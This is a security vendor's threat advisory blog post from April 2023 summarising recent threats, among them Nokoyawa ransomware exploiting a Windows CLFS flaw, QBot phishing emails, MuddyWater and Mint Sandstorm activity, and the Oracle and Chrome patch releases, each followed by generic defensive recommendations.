Threat advisories

Top Middle East Cyber Threats – April 25 2023

Apr-2023 6 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats. 

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead: 

Nokoyawa Ransomware Exploits Windows Server Vulnerability

Several attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses have been detected in the Middle East, North America, and Asia regions.

These exploits were very similar to already-known Common Log File System (CLFS) driver exploits, including a zero-day privilege escalation exploit in Common Log File System (CLFS) driver, which supported different versions and builds of Windows, including Windows 11.

The exploit was highly obfuscated with more than 80% of its code being “junk” elegantly compiled into the binary. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of the April Patch Tuesday.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files, or attachments.
Don’t allow Macros for unknown MSOffice files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious attachments.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing and suspicious emails.

Fraudulent Business Emails Deliver QBot Malware

A significant increase in attacks using QBot family banking Trojans has been observed. The malware is delivered through email letters written in different languages, with variations coming in English, German, Italian, and French. The messages are based on real business letters that the attackers have gained access to, allowing them to join the correspondence thread with messages of their own. To add authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field, but the sender’s fraudulent email address will be different from that of the real correspondent.

The QBot malware delivery scheme begins with an e-mail letter that includes a PDF file in the attachment. The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert, advising the user to click Open to view the attached files. If the user complies, an archive will be downloaded from a compromised site, protected with a password provided in the original PDF file. The downloaded malicious file will execute a PowerShell script on the computer, which uses wget to download the final-stage DLL file from a remote server.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files, or attachments.
Don’t allow Macros for unknown MSOffice files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing and suspicious emails.

MuddyWater Hackers Use SimpleHelp for Persistent System Access

MuddyWater continues its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.

While the nation-state group has previously employed ScreenConnect, RemoteUtilities, and Syncro, a new analysis from Group-IB has revealed that they used SimpleHelp remote support software in June 2022. SimpleHelp is a legitimate remote device control and management tool, which allows the group to maintain persistence on victim devices

MuddyWater has been active since at least 2017 and is believed to be associated with Iran’s Ministry of Intelligence and Security (MOIS). Some of the group’s top targets include Turkey, Pakistan, the U.A.E., Iraq, Israel, Saudi Arabia, Jordan, the U.S., Azerbaijan, and Afghanistan.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MSOffice files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviours and shared IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing and suspicious emails.

Mint Sandstorm Exploits Zero-Day Vulnerability

Microsoft has observed that an Iranian nation-state actor (Mint Sandstorm) is weaponizing N-day vulnerabilities in popular enterprise applications and conducting highly targeted phishing campaigns to quickly and successfully access desired environments. The group has also been developing and using custom tooling in selected targets for discovery, persistent, moving laterally in the environment and stealing Active Directory database. The threat actor uses SSH tunnelling to connect to C2 servers and deploy custom .NET made malware such as Drkok and Solider.

Mint Sandstorm is known to pursue targets in both the private and public sectors, including political dissidents, activist leaders, the Defense Industrial Base (DIB), journalists, and employees from multiple government agencies.

RECOMMENDATIONS

Ensure all systems are patched and updated.
Avoid clicking or opening untrusted or unknown links, files or attachments.
Don’t allow Macros for unknown MSOffice and PDF files.
Enable software restriction policies and application whitelisting.
Ensure that your email server is configured to block any suspicious attached files.
Enforce the Restricted PowerShell script execution policy for end users.
Monitor your network for abnormal behaviors and shared IoCs.
Ensure frequent backups are in place.
Educate employees about detecting and reporting phishing / suspicious emails.

Oracle’s April Patch Update Fixes Multiple Vulnerabilities

Oracle has published a security update to address multiple vulnerabilities as part of its Critical Patch Update for April 2023.

The update includes 231 CVEs in 433 new security patches across 142 products families. Out of the 433 security updates published, 72 patches were classified as critical, 156 as medium, 194 as high, and 11 as low in severity level. Several of these vulnerabilities can be exploited remotely without authentication. A remote attacker exploiting these vulnerabilities may perform unauthorized operations or unauthorized deletion or falsification of sensitive information.

RECOMMENDATIONS

Ensure all systems are patched and updated.

Google Chrome Releases Update to Address Zero-Day Vulnerabilities.

Google has published a security update to address multiple vulnerabilities in Chrome browser that are fixed in Chrome’s latest version (112.0.5615.137/138 for Windows and 112.0.5615.137 for Mac).

The update includes 8 security fixes,5 of which were contributed by external researchers. Out of these 5, four are assigned as High and one as Medium in severity level.

One of the CVEs addressed in this update is CVE-2023-2136, described as Integer overflow in Skia. The Skia Graphics Engine or Skia is an open-source 2D graphics library written in C++. An integer overflow occurs when an arithmetic operation attempts to create a numeric value that is outside of the range and can be represented with a given number of digits.

Google is aware that an exploit for CVE-2023-2136 exists in the wild.

RECOMMENDATIONS